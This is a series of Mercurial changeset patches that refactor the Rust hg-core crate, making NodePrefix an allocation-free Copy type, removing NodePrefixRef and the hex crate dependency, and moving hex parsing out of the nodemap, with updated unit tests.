++++++++++++++++++++++++++++++++++++++++++++++++++++++ + $ hg rm a + $ hg ci -Am removea -u user1 + $ hg churn --diffstat + user1 +4/-4 +++++++++++++++++++++++++++--------------------------- # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1611571727 -3600 # Mon Jan 25 11:48:47 2021 +0100 # Node ID 645ee7225fab310a7a153aa1f5dbef7dd0b6cd56 # Parent b84c3d43ff2ec1dee2cbb244af4d500bf8d24947 rust: Make NodePrefix allocation-free and Copy, remove NodePrefixRef The `*Ref` struct only existed to avoid allocating `Vec`s when cloning `NodePrefix`, but we can avoid having `Vec` in the first place by using an inline array instead. This makes `NodePrefix` 21 bytes (with 1 for the length) which is smaller than before as `Vec` alone is 24 bytes. Differential Revision: https://phab.mercurial-scm.org/D9863 diff --git a/rust/Cargo.lock b/rust/Cargo.lock --- a/rust/Cargo.lock +++ b/rust/Cargo.lock @@ -286,11 +286,6 @@ ] [[package]] -name = "hex" -version = "0.4.2" -source = "registry+https://github.com/rust-lang/crates.io-index" - -[[package]] name = "hg-core" version = "0.1.0" dependencies = [ @@ -300,7 +295,6 @@ "crossbeam-channel 0.4.4 (registry+https://github.com/rust-lang/crates.io-index)", "flate2 1.0.19 (registry+https://github.com/rust-lang/crates.io-index)", "format-bytes 0.1.3 (registry+https://github.com/rust-lang/crates.io-index)", - "hex 0.4.2 (registry+https://github.com/rust-lang/crates.io-index)", "im-rc 15.0.0 (registry+https://github.com/rust-lang/crates.io-index)", "lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)", "log 0.4.11 (registry+https://github.com/rust-lang/crates.io-index)", @@ -956,7 +950,6 @@ "checksum getrandom 0.1.15 (registry+https://github.com/rust-lang/crates.io-index)" = "fc587bc0ec293155d5bfa6b9891ec18a1e330c234f896ea47fbada4cadbe47e6" "checksum glob 0.3.0 (registry+https://github.com/rust-lang/crates.io-index)" = "9b919933a397b79c37e33b77bb2aa3dc8eb6e165ad809e58ff75bc7db2e34574" "checksum hermit-abi 0.1.17 (registry+https://github.com/rust-lang/crates.io-index)" = "5aca5565f760fb5b220e499d72710ed156fdb74e631659e99377d9ebfbd13ae8" -"checksum hex 0.4.2 (registry+https://github.com/rust-lang/crates.io-index)" = "644f9158b2f133fd50f5fb3242878846d9eb792e445c893805ff0e3824006e35" "checksum humantime 1.3.0 (registry+https://github.com/rust-lang/crates.io-index)" = "df004cfca50ef23c36850aaaa59ad52cc70d0e90243c3c7737a4dd32dc7a3c4f" "checksum im-rc 15.0.0 (registry+https://github.com/rust-lang/crates.io-index)" = "3ca8957e71f04a205cb162508f9326aea04676c8dfd0711220190d6b83664f3f" "checksum itertools 0.9.0 (registry+https://github.com/rust-lang/crates.io-index)" = "284f18f85651fe11e8a991b2adb42cb078325c996ed026d994719efcfca1d54b" diff --git a/rust/hg-core/Cargo.toml b/rust/hg-core/Cargo.toml --- a/rust/hg-core/Cargo.toml +++ b/rust/hg-core/Cargo.toml @@ -11,7 +11,6 @@ [dependencies] bytes-cast = "0.1" byteorder = "1.3.4" -hex = "0.4.2" im-rc = "15.0.*" lazy_static = "1.4.0" memchr = "2.3.3" diff --git a/rust/hg-core/src/operations/cat.rs b/rust/hg-core/src/operations/cat.rs --- a/rust/hg-core/src/operations/cat.rs +++ b/rust/hg-core/src/operations/cat.rs @@ -88,13 +88,13 @@ _ => { let changelog_node = NodePrefix::from_hex(&rev) .map_err(|_| CatRevErrorKind::InvalidRevision)?; - changelog.get_node(changelog_node.borrow())? + changelog.get_node(changelog_node)? } }; let manifest_node = Node::from_hex(&changelog_entry.manifest_node()?) .map_err(|_| CatRevErrorKind::CorruptedRevlog)?; - let manifest_entry = manifest.get_node((&manifest_node).into())?; + let manifest_entry = manifest.get_node(manifest_node.into())?; let mut bytes = vec![]; for (manifest_file, node_bytes) in manifest_entry.files_with_nodes() { @@ -107,7 +107,7 @@ Revlog::open(repo, &index_path, Some(&data_path))?; let file_node = Node::from_hex(node_bytes) .map_err(|_| CatRevErrorKind::CorruptedRevlog)?; - let file_rev = file_log.get_node_rev((&file_node).into())?; + let file_rev = file_log.get_node_rev(file_node.into())?; let data = file_log.get_rev_data(file_rev)?; if data.starts_with(&METADATA_DELIMITER) { let end_delimiter_position = data diff --git a/rust/hg-core/src/operations/debugdata.rs b/rust/hg-core/src/operations/debugdata.rs --- a/rust/hg-core/src/operations/debugdata.rs +++ b/rust/hg-core/src/operations/debugdata.rs @@ -93,7 +93,7 @@ _ => { let node = NodePrefix::from_hex(&rev) .map_err(|_| DebugDataErrorKind::InvalidRevision)?; - let rev = revlog.get_node_rev(node.borrow())?; + let rev = revlog.get_node_rev(node)?; revlog.get_rev_data(rev)? } }; diff --git a/rust/hg-core/src/operations/list_tracked_files.rs b/rust/hg-core/src/operations/list_tracked_files.rs --- a/rust/hg-core/src/operations/list_tracked_files.rs +++ b/rust/hg-core/src/operations/list_tracked_files.rs @@ -147,12 +147,12 @@ _ => { let changelog_node = NodePrefix::from_hex(&rev) .or(Err(ListRevTrackedFilesErrorKind::InvalidRevision))?; - changelog.get_node(changelog_node.borrow())? + changelog.get_node(changelog_node)? } }; let manifest_node = Node::from_hex(&changelog_entry.manifest_node()?) .or(Err(ListRevTrackedFilesErrorKind::CorruptedRevlog))?; - let manifest_entry = manifest.get_node((&manifest_node).into())?; + let manifest_entry = manifest.get_node(manifest_node.into())?; Ok(FilesForRev(manifest_entry)) } diff --git a/rust/hg-core/src/revlog.rs b/rust/hg-core/src/revlog.rs --- a/rust/hg-core/src/revlog.rs +++ b/rust/hg-core/src/revlog.rs @@ -9,7 +9,7 @@ pub mod nodemap; mod nodemap_docket; pub mod path_encode; -pub use node::{FromHexError, Node, NodePrefix, NodePrefixRef}; +pub use node::{FromHexError, Node, NodePrefix}; pub mod changelog; pub mod index; pub mod manifest; diff --git a/rust/hg-core/src/revlog/changelog.rs b/rust/hg-core/src/revlog/changelog.rs --- a/rust/hg-core/src/revlog/changelog.rs +++ b/rust/hg-core/src/revlog/changelog.rs @@ -1,6 +1,6 @@ use crate::repo::Repo; use crate::revlog::revlog::{Revlog, RevlogError}; -use crate::revlog::NodePrefixRef; +use crate::revlog::NodePrefix; use crate::revlog::Revision; /// A specialized `Revlog` to work with `changelog` data format. @@ -19,7 +19,7 @@ /// Return the `ChangelogEntry` a given node id. pub fn get_node( &self, - node: NodePrefixRef, + node: NodePrefix, ) -> Result<ChangelogEntry, RevlogError> { let rev = self.revlog.get_node_rev(node)?; self.get_rev(rev) diff --git a/rust/hg-core/src/revlog/manifest.rs b/rust/hg-core/src/revlog/manifest.rs --- a/rust/hg-core/src/revlog/manifest.rs +++ b/rust/hg-core/src/revlog/manifest.rs @@ -1,6 +1,6 @@ use crate::repo::Repo; use crate::revlog::revlog::{Revlog, RevlogError}; -use crate::revlog::NodePrefixRef; +use crate::revlog::NodePrefix; use crate::revlog::Revision; use crate::utils::hg_path::HgPath; @@ -20,7 +20,7 @@ /// Return the `ManifestEntry` of a given node id. pub fn get_node( &self, - node: NodePrefixRef, + node: NodePrefix, ) -> Result<ManifestEntry, RevlogError> { let rev = self.revlog.get_node_rev(node)?; self.get_rev(rev) diff --git a/rust/hg-core/src/revlog/node.rs b/rust/hg-core/src/revlog/node.rs --- a/rust/hg-core/src/revlog/node.rs +++ b/rust/hg-core/src/revlog/node.rs @@ -9,8 +9,7 @@ //! of a revision. use bytes_cast::BytesCast; -use hex::{self, FromHex}; -use std::convert::TryFrom; +use std::convert::{TryFrom, TryInto}; use std::fmt; /// The length in bytes of a `Node` @@ -50,7 +49,7 @@ /// the size or return an error at runtime. /// /// [`nybbles_len`]: #method.nybbles_len -#[derive(Clone, Debug, PartialEq, BytesCast)] +#[derive(Copy, Clone, Debug, PartialEq, BytesCast)] #[repr(transparent)] pub struct Node { data: NodeData, @@ -72,7 +71,7 @@ type Error = (); #[inline] - fn try_from(bytes: &'a [u8]) -> Result<&'a Node, Self::Error> { + fn try_from(bytes: &'a [u8]) -> Result<Self, Self::Error> { match Node::from_bytes(bytes) { Ok((node, rest)) if rest.is_empty() => Ok(node), _ => Err(()), @@ -80,6 +79,17 @@ } } +/// Return an error if the slice has an unexpected length +impl TryFrom<&'_ [u8]> for Node { + type Error = std::array::TryFromSliceError; + + #[inline] + fn try_from(bytes: &'_ [u8]) -> Result<Self, Self::Error> { + let data = bytes.try_into()?; + Ok(Self { data }) + } +} + impl fmt::LowerHex for Node { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { for &byte in &self.data { @@ -124,9 +134,12 @@ /// To be used in FFI and I/O only, in order to facilitate future /// changes of hash format. pub fn from_hex(hex: impl AsRef<[u8]>) -> Result<Node, FromHexError> { - Ok(NodeData::from_hex(hex.as_ref()) - .map_err(|_| FromHexError)? - .into()) + let prefix = NodePrefix::from_hex(hex)?; + if prefix.nybbles_len() == NODE_NYBBLES_LENGTH { + Ok(Self { data: prefix.data }) + } else { + Err(FromHexError) + } } /// Provide access to binary data @@ -143,10 +156,14 @@ /// Since it can potentially come from an hexadecimal representation with /// odd length, it needs to carry around whether the last 4 bits are relevant /// or not. -#[derive(Debug, PartialEq)] +#[derive(Debug, PartialEq, Copy, Clone)] pub struct NodePrefix { - buf: Vec<u8>, - is_odd: bool, + /// In `1..=NODE_NYBBLES_LENGTH` + nybbles_len: u8, + /// The first `4 * length_in_nybbles` bits are used (considering bits + /// within a bytes in big-endian: most significant first), the rest + /// are zero. + data: NodeData, } impl NodePrefix { @@ -164,52 +181,35 @@ return Err(FromHexError); } - let is_odd = len % 2 == 1; - let even_part = if is_odd { &hex[..len - 1] } else { hex }; - let mut buf: Vec<u8> = - Vec::from_hex(&even_part).map_err(|_| FromHexError)?; - - if is_odd { - let latest_char = char::from(hex[len - 1]); - let latest_nybble = - latest_char.to_digit(16).ok_or_else(|| FromHexError)? as u8; - buf.push(latest_nybble << 4); + let mut data = [0; NODE_BYTES_LENGTH]; + let mut nybbles_len = 0; + for &ascii_byte in hex { + let nybble = match char::from(ascii_byte).to_digit(16) { + Some(digit) => digit as u8, + None => return Err(FromHexError), + }; + // Fill in the upper half of a byte first, then the lower half. + let shift = if nybbles_len % 2 == 0 { 4 } else { 0 }; + data[nybbles_len as usize / 2] |= nybble << shift; + nybbles_len += 1; } - Ok(NodePrefix { buf, is_odd }) + Ok(Self { data, nybbles_len }) } - pub fn borrow(&self) -> NodePrefixRef { - NodePrefixRef { - buf: &self.buf, - is_odd: self.is_odd, - } - } -} - -#[derive(Clone, Debug, PartialEq)] -pub struct NodePrefixRef<'a> { - buf: &'a [u8], - is_odd: bool, -} - -impl<'a> NodePrefixRef<'a> { - pub fn len(&self) -> usize { - if self.is_odd { - self.buf.len() * 2 - 1 - } else { - self.buf.len() * 2 - } + pub fn nybbles_len(&self) -> usize { + self.nybbles_len as _ } pub fn is_prefix_of(&self, node: &Node) -> bool { - if self.is_odd { - let buf = self.buf; - let last_pos = buf.len() - 1; - node.data.starts_with(buf.split_at(last_pos).0) - && node.data[last_pos] >> 4 == buf[last_pos] >> 4 - } else { - node.data.starts_with(self.buf) + let full_bytes = self.nybbles_len() / 2; + if self.data[..full_bytes] != node.data[..full_bytes] { + return false; } + if self.nybbles_len() % 2 == 0 { + return true; + } + let last = self.nybbles_len() - 1; + self.get_nybble(last) == node.get_nybble(last) } /// Retrieve the `i`th half-byte from the prefix. @@ -217,8 +217,12 @@ /// This is also the `i`th hexadecimal digit in numeric form, /// also called a [nybble](https://en.wikipedia.org/wiki/Nibble). pub fn get_nybble(&self, i: usize) -> u8 { - assert!(i < self.len()); - get_nybble(self.buf, i) + assert!(i < self.nybbles_len()); + get_nybble(&self.data, i) + } + + fn iter_nybbles(&self) -> impl Iterator<Item = u8> + '_ { + (0..self.nybbles_len()).map(move |i| get_nybble(&self.data, i)) } /// Return the index first nybble that's different from `node` @@ -229,42 +233,49 @@ /// /// Returned index is as in `get_nybble`, i.e., starting at 0. pub fn first_different_nybble(&self, node: &Node) -> Option<usize> { - let buf = self.buf; - let until = if self.is_odd { - buf.len() - 1 - } else { - buf.len() - }; - for (i, item) in buf.iter().enumerate().take(until) { - if *item != node.data[i] { - return if *item & 0xf0 == node.data[i] & 0xf0 { - Some(2 * i + 1) - } else { - Some(2 * i) - }; - } + self.iter_nybbles() + .zip(NodePrefix::from(*node).iter_nybbles()) + .position(|(a, b)| a != b) + } +} + +impl fmt::LowerHex for NodePrefix { + fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { + let full_bytes = self.nybbles_len() / 2; + for &byte in &self.data[..full_bytes] { + write!(f, "{:02x}", byte)? } - if self.is_odd && buf[until] & 0xf0 != node.data[until] & 0xf0 { - Some(until * 2) - } else { - None + if self.nybbles_len() % 2 == 1 { + let last = self.nybbles_len() - 1; + write!(f, "{:x}", self.get_nybble(last))? + } + Ok(()) + } +} + +/// A shortcut for full `Node` references +impl From<&'_ Node> for NodePrefix { + fn from(node: &'_ Node) -> Self { + NodePrefix { + nybbles_len: node.nybbles_len() as _, + data: node.data, } } } /// A shortcut for full `Node` references -impl<'a> From<&'a Node> for NodePrefixRef<'a> { - fn from(node: &'a Node) -> Self { - NodePrefixRef { - buf: &node.data, - is_odd: false, +impl From<Node> for NodePrefix { + fn from(node: Node) -> Self { + NodePrefix { + nybbles_len: node.nybbles_len() as _, + data: node.data, } } } -impl PartialEq<Node> for NodePrefixRef<'_> { +impl PartialEq<Node> for NodePrefix { fn eq(&self, other: &Node) -> bool { - !self.is_odd && self.buf == other.data + Self::from(*other) == *self } } @@ -272,18 +283,16 @@ mod tests { use super::*; - fn sample_node() -> Node { - let mut data = [0; NODE_BYTES_LENGTH]; - data.copy_from_slice(&[ + const SAMPLE_NODE_HEX: &str = "0123456789abcdeffedcba9876543210deadbeef"; + const SAMPLE_NODE: Node = Node { + data: [ 0x01, 0x23, 0x45, 0x67, 0x89, 0xab, 0xcd, 0xef, 0xfe, 0xdc, 0xba, 0x98, 0x76, 0x54, 0x32, 0x10, 0xde, 0xad, 0xbe, 0xef, - ]); - data.into() - } + ], + }; /// Pad an hexadecimal string to reach `NODE_NYBBLES_LENGTH` - ///check_hash - /// The padding is made with zeros + /// The padding is made with zeros. pub fn hex_pad_right(hex: &str) -> String { let mut res = hex.to_string(); while res.len() < NODE_NYBBLES_LENGTH { @@ -292,55 +301,30 @@ res } - fn sample_node_hex() -> String { - hex_pad_right("0123456789abcdeffedcba9876543210deadbeef") - } - #[test] fn test_node_from_hex() { - assert_eq!(Node::from_hex(&sample_node_hex()).unwrap(), sample_node()); - - let mut short = hex_pad_right("0123"); - short.pop(); - short.pop(); - assert!(Node::from_hex(&short).is_err()); - - let not_hex = hex_pad_right("012... oops"); - assert!(Node::from_hex(¬_hex).is_err(),); + let not_hex = "012... oops"; + let too_short = "0123"; + let too_long = format!("{}0", SAMPLE_NODE_HEX); + assert_eq!(Node::from_hex(SAMPLE_NODE_HEX).unwrap(), SAMPLE_NODE); + assert!(Node::from_hex(not_hex).is_err()); + assert!(Node::from_hex(too_short).is_err()); + assert!(Node::from_hex(&too_long).is_err()); } #[test] fn test_node_encode_hex() { - assert_eq!(format!("{:x}", sample_node()), sample_node_hex()); + assert_eq!(format!("{:x}", SAMPLE_NODE), SAMPLE_NODE_HEX); } #[test] - fn test_prefix_from_hex() -> Result<(), FromHexError> { - assert_eq!( - NodePrefix::from_hex("0e1")?, - NodePrefix { - buf: vec![14, 16], - is_odd: true - } - ); + fn test_prefix_from_to_hex() -> Result<(), FromHexError> { + assert_eq!(format!("{:x}", NodePrefix::from_hex("0e1")?), "0e1"); + assert_eq!(format!("{:x}", NodePrefix::from_hex("0e1a")?), "0e1a"); assert_eq!( - NodePrefix::from_hex("0e1a")?, - NodePrefix { - buf: vec![14, 26], - is_odd: false - } + format!("{:x}", NodePrefix::from_hex(SAMPLE_NODE_HEX)?), + SAMPLE_NODE_HEX ); - - // checking limit case - let node_as_vec = sample_node().data.iter().cloned().collect(); - assert_eq!( - NodePrefix::from_hex(sample_node_hex())?, - NodePrefix { - buf: node_as_vec, - is_odd: false - } - ); - Ok(()) } @@ -358,49 +342,47 @@ node_data[0] = 0x12; node_data[1] = 0xca; let node = Node::from(node_data); - assert!(NodePrefix::from_hex("12")?.borrow().is_prefix_of(&node)); - assert!(!NodePrefix::from_hex("1a")?.borrow().is_prefix_of(&node)); - assert!(NodePrefix::from_hex("12c")?.borrow().is_prefix_of(&node)); - assert!(!NodePrefix::from_hex("12d")?.borrow().is_prefix_of(&node)); + assert!(NodePrefix::from_hex("12")?.is_prefix_of(&node)); + assert!(!NodePrefix::from_hex("1a")?.is_prefix_of(&node)); + assert!(NodePrefix::from_hex("12c")?.is_prefix_of(&node)); + assert!(!NodePrefix::from_hex("12d")?.is_prefix_of(&node)); Ok(()) } #[test] fn test_get_nybble() -> Result<(), FromHexError> { let prefix = NodePrefix::from_hex("dead6789cafe")?; - assert_eq!(prefix.borrow().get_nybble(0), 13); - assert_eq!(prefix.borrow().get_nybble(7), 9); + assert_eq!(prefix.get_nybble(0), 13); + assert_eq!(prefix.get_nybble(7), 9); Ok(()) } #[test] fn test_first_different_nybble_even_prefix() { let prefix = NodePrefix::from_hex("12ca").unwrap(); - let prefref = prefix.borrow(); let mut node = Node::from([0; NODE_BYTES_LENGTH]); - assert_eq!(prefref.first_different_nybble(&node), Some(0)); + assert_eq!(prefix.first_different_nybble(&node), Some(0)); node.data[0] = 0x13; - assert_eq!(prefref.first_different_nybble(&node), Some(1)); + assert_eq!(prefix.first_different_nybble(&node), Some(1)); node.data[0] = 0x12; - assert_eq!(prefref.first_different_nybble(&node), Some(2)); + assert_eq!(prefix.first_different_nybble(&node), Some(2)); node.data[1] = 0xca; // now it is a prefix - assert_eq!(prefref.first_different_nybble(&node), None); + assert_eq!(prefix.first_different_nybble(&node), None); } #[test] fn test_first_different_nybble_odd_prefix() { let prefix = NodePrefix::from_hex("12c").unwrap(); - let prefref = prefix.borrow(); let mut node = Node::from([0; NODE_BYTES_LENGTH]); - assert_eq!(prefref.first_different_nybble(&node), Some(0)); + assert_eq!(prefix.first_different_nybble(&node), Some(0)); node.data[0] = 0x13; - assert_eq!(prefref.first_different_nybble(&node), Some(1)); + assert_eq!(prefix.first_different_nybble(&node), Some(1)); node.data[0] = 0x12; - assert_eq!(prefref.first_different_nybble(&node), Some(2)); + assert_eq!(prefix.first_different_nybble(&node), Some(2)); node.data[1] = 0xca; // now it is a prefix - assert_eq!(prefref.first_different_nybble(&node), None); + assert_eq!(prefix.first_different_nybble(&node), None); } } diff --git a/rust/hg-core/src/revlog/nodemap.rs b/rust/hg-core/src/revlog/nodemap.rs --- a/rust/hg-core/src/revlog/nodemap.rs +++ b/rust/hg-core/src/revlog/nodemap.rs @@ -13,8 +13,8 @@ //! is used in a more abstract context. use super::{ - node::NULL_NODE, FromHexError, Node, NodePrefix, NodePrefixRef, Revision, - RevlogIndex, NULL_REVISION, + node::NULL_NODE, FromHexError, Node, NodePrefix, Revision, RevlogIndex, + NULL_REVISION, }; use bytes_cast::{unaligned, BytesCast}; @@ -82,7 +82,7 @@ fn find_bin<'a>( &self, idx: &impl RevlogIndex, - prefix: NodePrefixRef<'a>, + prefix: NodePrefix, ) -> Result<Option<Revision>, NodeMapError>; /// Find the unique Revision whose `Node` hexadecimal string representation @@ -97,7 +97,7 @@ idx: &impl RevlogIndex, prefix: &str, ) -> Result<Option<Revision>, NodeMapError> { - self.find_bin(idx, NodePrefix::from_hex(prefix)?.borrow()) + self.find_bin(idx, NodePrefix::from_hex(prefix)?) } /// Give the size of the shortest node prefix that determines @@ -114,7 +114,7 @@ fn unique_prefix_len_bin<'a>( &self, idx: &impl RevlogIndex, - node_prefix: NodePrefixRef<'a>, + node_prefix: NodePrefix, ) -> Result<Option<usize>, NodeMapError>; /// Same as `unique_prefix_len_bin`, with the hexadecimal representation @@ -124,7 +124,7 @@ idx: &impl RevlogIndex, prefix: &str, ) -> Result<Option<usize>, NodeMapError> { - self.unique_prefix_len_bin(idx, NodePrefix::from_hex(prefix)?.borrow()) + self.unique_prefix_len_bin(idx, NodePrefix::from_hex(prefix)?) } /// Same as `unique_prefix_len_bin`, with a full `Node` as input @@ -278,7 +278,7 @@ /// Return `None` unless the `Node` for `rev` has given prefix in `index`. fn has_prefix_or_none( idx: &impl RevlogIndex, - prefix: NodePrefixRef, + prefix: NodePrefix, rev: Revision, ) -> Result<Option<Revision>, NodeMapError> { idx.node(rev) @@ -299,7 +299,7 @@ /// revision is the only one for a *subprefix* of the one being looked up. fn validate_candidate( idx: &impl RevlogIndex, - prefix: NodePrefixRef, + prefix: NodePrefix, candidate: (Option<Revision>, usize), ) -> Result<(Option<Revision>, usize), NodeMapError> { let (rev, steps) = candidate; @@ -426,7 +426,7 @@ /// `NodeTree`). fn lookup( &self, - prefix: NodePrefixRef, + prefix: NodePrefix, ) -> Result<(Option<Revision>, usize), NodeMapError> { for (i, visit_item) in self.visit(prefix).enumerate() { if let Some(opt) = visit_item.final_revision() { @@ -436,10 +436,7 @@ Err(NodeMapError::MultipleResults) } - fn visit<'n, 'p>( - &'n self, - prefix: NodePrefixRef<'p>, - ) -> NodeTreeVisitor<'n, 'p> { + fn visit<'n>(&'n self, prefix: NodePrefix) -> NodeTreeVisitor<'n> { NodeTreeVisitor { nt: self, prefix, @@ -617,9 +614,9 @@ } } -struct NodeTreeVisitor<'n, 'p> { +struct NodeTreeVisitor<'n> { nt: &'n NodeTree, - prefix: NodePrefixRef<'p>, + prefix: NodePrefix, visit: usize, nybble_idx: usize, done: bool, @@ -632,11 +629,11 @@ element: Element, } -impl<'n, 'p> Iterator for NodeTreeVisitor<'n, 'p> { +impl<'n> Iterator for NodeTreeVisitor<'n> { type Item = NodeTreeVisitItem; fn next(&mut self) -> Option<Self::Item> { - if self.done || self.nybble_idx >= self.prefix.len() { + if self.done || self.nybble_idx >= self.prefix.nybbles_len() { return None; } @@ -701,18 +698,18 @@ fn find_bin<'a>( &self, idx: &impl RevlogIndex, - prefix: NodePrefixRef<'a>, + prefix: NodePrefix, ) -> Result<Option<Revision>, NodeMapError> { - validate_candidate(idx, prefix.clone(), self.lookup(prefix)?) + validate_candidate(idx, prefix, self.lookup(prefix)?) .map(|(opt, _shortest)| opt) } fn unique_prefix_len_bin<'a>( &self, idx: &impl RevlogIndex, - prefix: NodePrefixRef<'a>, + prefix: NodePrefix, ) -> Result<Option<usize>, NodeMapError> { - validate_candidate(idx, prefix.clone(), self.lookup(prefix)?) + validate_candidate(idx, prefix, self.lookup(prefix)?) .map(|(opt, shortest)| opt.map(|_rev| shortest)) } } diff --git a/rust/hg-core/src/revlog/revlog.rs b/rust/hg-core/src/revlog/revlog.rs --- a/rust/hg-core/src/revlog/revlog.rs +++ b/rust/hg-core/src/revlog/revlog.rs @@ -11,7 +11,7 @@ use zstd; use super::index::Index; -use super::node::{NodePrefixRef, NODE_BYTES_LENGTH, NULL_NODE}; +use super::node::{NodePrefix, NODE_BYTES_LENGTH, NULL_NODE}; use super::nodemap; use super::nodemap::NodeMap; use super::nodemap_docket::NodeMapDocket; @@ -117,7 +117,7 @@ #[timed] pub fn get_node_rev( &self, - node: NodePrefixRef, + node: NodePrefix, ) -> Result<Revision, RevlogError> { if let Some(nodemap) = &self.nodemap { return nodemap diff --git a/rust/hg-cpython/src/revlog.rs b/rust/hg-cpython/src/revlog.rs --- a/rust/hg-cpython/src/revlog.rs +++ b/rust/hg-cpython/src/revlog.rs @@ -64,7 +64,7 @@ let nt = opt.as_ref().unwrap(); let idx = &*self.cindex(py).borrow(); let node = node_from_py_bytes(py, &node)?; - nt.find_bin(idx, (&node).into()).map_err(|e| nodemap_error(py, e)) + nt.find_bin(idx, node.into()).map_err(|e| nodemap_error(py, e)) } /// same as `get_rev()` but raises a bare `error.RevlogError` if node # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1611595526 -3600 # Mon Jan 25 18:25:26 2021 +0100 # Node ID 18a261b11b202abc79f765c360bd76d204ec9fef # Parent 645ee7225fab310a7a153aa1f5dbef7dd0b6cd56 rust: Remove hex parsing from the nodemap Separating concerns simplifies error types. Differential Revision: https://phab.mercurial-scm.org/D9864 diff --git a/rust/hg-core/examples/nodemap/main.rs b/rust/hg-core/examples/nodemap/main.rs --- a/rust/hg-core/examples/nodemap/main.rs +++ b/rust/hg-core/examples/nodemap/main.rs @@ -49,7 +49,7 @@ fn query(index: &Index, nm: &NodeTree, prefix: &str) { let start = Instant::now(); - let res = nm.find_hex(index, prefix); + let res = NodePrefix::from_hex(prefix).map(|p| nm.find_bin(index, p)); println!("Result found in {:?}: {:?}", start.elapsed(), res); } diff --git a/rust/hg-core/src/revlog/nodemap.rs b/rust/hg-core/src/revlog/nodemap.rs --- a/rust/hg-core/src/revlog/nodemap.rs +++ b/rust/hg-core/src/revlog/nodemap.rs @@ -13,8 +13,7 @@ //! is used in a more abstract context. use super::{ - node::NULL_NODE, FromHexError, Node, NodePrefix, Revision, RevlogIndex, - NULL_REVISION, + node::NULL_NODE, Node, NodePrefix, Revision, RevlogIndex, NULL_REVISION, }; use bytes_cast::{unaligned, BytesCast}; @@ -27,17 +26,10 @@ #[derive(Debug, PartialEq)] pub enum NodeMapError { MultipleResults, - InvalidNodePrefix, /// A `Revision` stored in the nodemap could not be found in the index RevisionNotInIndex(Revision), } -impl From<FromHexError> for NodeMapError { - fn from(_: FromHexError) -> Self { - NodeMapError::InvalidNodePrefix - } -} - /// Mapping system from Mercurial nodes to revision numbers. /// /// ## `RevlogIndex` and `NodeMap` @@ -85,21 +77,6 @@ prefix: NodePrefix, ) -> Result<Option<Revision>, NodeMapError>; - /// Find the unique Revision whose `Node` hexadecimal string representation - /// starts with a given prefix - /// - /// If no Revision matches the given prefix, `Ok(None)` is returned. - /// - /// If several Revisions match the given prefix, a [`MultipleResults`] - /// error is returned. - fn find_hex( - &self, - idx: &impl RevlogIndex, - prefix: &str, - ) -> Result<Option<Revision>, NodeMapError> { - self.find_bin(idx, NodePrefix::from_hex(prefix)?) - } - /// Give the size of the shortest node prefix that determines /// the revision uniquely. /// @@ -117,16 +94,6 @@ node_prefix: NodePrefix, ) -> Result<Option<usize>, NodeMapError>; - /// Same as `unique_prefix_len_bin`, with the hexadecimal representation - /// of the prefix as input. - fn unique_prefix_len_hex( - &self, - idx: &impl RevlogIndex, - prefix: &str, - ) -> Result<Option<usize>, NodeMapError> { - self.unique_prefix_len_bin(idx, NodePrefix::from_hex(prefix)?) - } - /// Same as `unique_prefix_len_bin`, with a full `Node` as input fn unique_prefix_len_node( &self, @@ -802,6 +769,10 @@ ]) } + fn hex(s: &str) -> NodePrefix { + NodePrefix::from_hex(s).unwrap() + } + #[test] fn test_nt_debug() { let nt = sample_nodetree(); @@ -820,11 +791,11 @@ pad_insert(&mut idx, 1, "1234deadcafe"); let nt = NodeTree::from(vec![block! {1: Rev(1)}]); - assert_eq!(nt.find_hex(&idx, "1")?, Some(1)); - assert_eq!(nt.find_hex(&idx, "12")?, Some(1)); - assert_eq!(nt.find_hex(&idx, "1234de")?, Some(1)); - assert_eq!(nt.find_hex(&idx, "1a")?, None); - assert_eq!(nt.find_hex(&idx, "ab")?, None); + assert_eq!(nt.find_bin(&idx, hex("1"))?, Some(1)); + assert_eq!(nt.find_bin(&idx, hex("12"))?, Some(1)); + assert_eq!(nt.find_bin(&idx, hex("1234de"))?, Some(1)); + assert_eq!(nt.find_bin(&idx, hex("1a"))?, None); + assert_eq!(nt.find_bin(&idx, hex("ab"))?, None); // and with full binary Nodes assert_eq!(nt.find_node(&idx, idx.get(&1).unwrap())?, Some(1)); @@ -841,12 +812,12 @@ let nt = sample_nodetree(); - assert_eq!(nt.find_hex(&idx, "0"), Err(MultipleResults)); - assert_eq!(nt.find_hex(&idx, "01"), Ok(Some(9))); - assert_eq!(nt.find_hex(&idx, "00"), Err(MultipleResults)); - assert_eq!(nt.find_hex(&idx, "00a"), Ok(Some(0))); - assert_eq!(nt.unique_prefix_len_hex(&idx, "00a"), Ok(Some(3))); - assert_eq!(nt.find_hex(&idx, "000"), Ok(Some(NULL_REVISION))); + assert_eq!(nt.find_bin(&idx, hex("0")), Err(MultipleResults)); + assert_eq!(nt.find_bin(&idx, hex("01")), Ok(Some(9))); + assert_eq!(nt.find_bin(&idx, hex("00")), Err(MultipleResults)); + assert_eq!(nt.find_bin(&idx, hex("00a")), Ok(Some(0))); + assert_eq!(nt.unique_prefix_len_bin(&idx, hex("00a")), Ok(Some(3))); + assert_eq!(nt.find_bin(&idx, hex("000")), Ok(Some(NULL_REVISION))); } #[test] @@ -864,13 +835,13 @@ root: block![0: Block(1), 1:Block(3), 12: Rev(2)], masked_inner_blocks: 1, }; - assert_eq!(nt.find_hex(&idx, "10")?, Some(1)); - assert_eq!(nt.find_hex(&idx, "c")?, Some(2)); - assert_eq!(nt.unique_prefix_len_hex(&idx, "c")?, Some(1)); - assert_eq!(nt.find_hex(&idx, "00"), Err(MultipleResults)); - assert_eq!(nt.find_hex(&idx, "000")?, Some(NULL_REVISION)); - assert_eq!(nt.unique_prefix_len_hex(&idx, "000")?, Some(3)); - assert_eq!(nt.find_hex(&idx, "01")?, Some(9)); + assert_eq!(nt.find_bin(&idx, hex("10"))?, Some(1)); + assert_eq!(nt.find_bin(&idx, hex("c"))?, Some(2)); + assert_eq!(nt.unique_prefix_len_bin(&idx, hex("c"))?, Some(1)); + assert_eq!(nt.find_bin(&idx, hex("00")), Err(MultipleResults)); + assert_eq!(nt.find_bin(&idx, hex("000"))?, Some(NULL_REVISION)); + assert_eq!(nt.unique_prefix_len_bin(&idx, hex("000"))?, Some(3)); + assert_eq!(nt.find_bin(&idx, hex("01"))?, Some(9)); 